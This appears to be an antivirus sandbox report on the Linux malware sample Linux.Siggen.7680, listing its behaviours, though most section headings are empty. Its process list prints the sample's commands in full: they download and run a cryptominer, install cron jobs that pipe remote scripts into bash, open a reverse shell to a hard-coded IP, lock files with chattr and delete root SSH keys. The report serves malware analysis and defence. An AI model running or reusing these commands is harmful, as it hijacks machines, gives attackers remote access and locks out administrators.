Linux.Siggen.7680

To ensure autorun and distribution:

Creates or modifies the following files:

Malicious functions:

Launches itself as a daemon

Gets access to SSH keys

Performs process tracing:

Launches processes:

rm -f /etc/hosts.old
curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner
chattr -ia /etc/crontab > /dev/null 2>&1
chattr -ia -R /var/spool/cron/crontabs
chattr -ia -R /root/.ssh
chattr +i /etc/cron.hourly/prelink
chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1
curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner
chmod 755 /etc/cron.hourly/prelink
rm -rf /root/.ssh/authorized_keys2
echo \x27#!/bin/bash\x27 > /etc/cron.hourly/prelink
chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1
chmod 755 /tmp/.miner
/tmp/.miner
chattr +i /etc/cron.d/watch > /dev/null 2>&1
echo \x270 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash \x27 >> /etc/cron.d/watch
rm -rf /root/.ssh/authorized_keys
chattr -ia /etc/crontab
echo \x270 1 * * * root curl -fs http://z.shavsl.com/b|bash \x27 > /etc/cron.d/watch
chattr -ia -R /etc/cron.d
chattr +i /root/.ssh/authorized_keys2
chattr -ia -R /etc/cron.d > /dev/null 2>&1
chattr -ia -R /var/spool/cron
chattr +i /etc/cron.d/watch
chattr -ia -R /etc/cron.hourly
chattr -ia -R /etc/cron.hourly > /dev/null 2>&1
chattr +i /root/.ssh/authorized_keys
echo \x27bash -i >& /dev/tcp/198.144.156.34/8443 0>&1\x27 >> /etc/cron.hourly/prelink
chattr -ia -R /var/spool/cron > /dev/null 2>&1

Performs operations with the file system:

Modifies file access rights:

Creates folders:

Creates or modifies files:

Deletes files:

Network activity:

Establishes connection:

DNS ASK:

Sends data to the following servers:

Receives data from the following servers:

Other:

Collects CPU information

Collects RAM information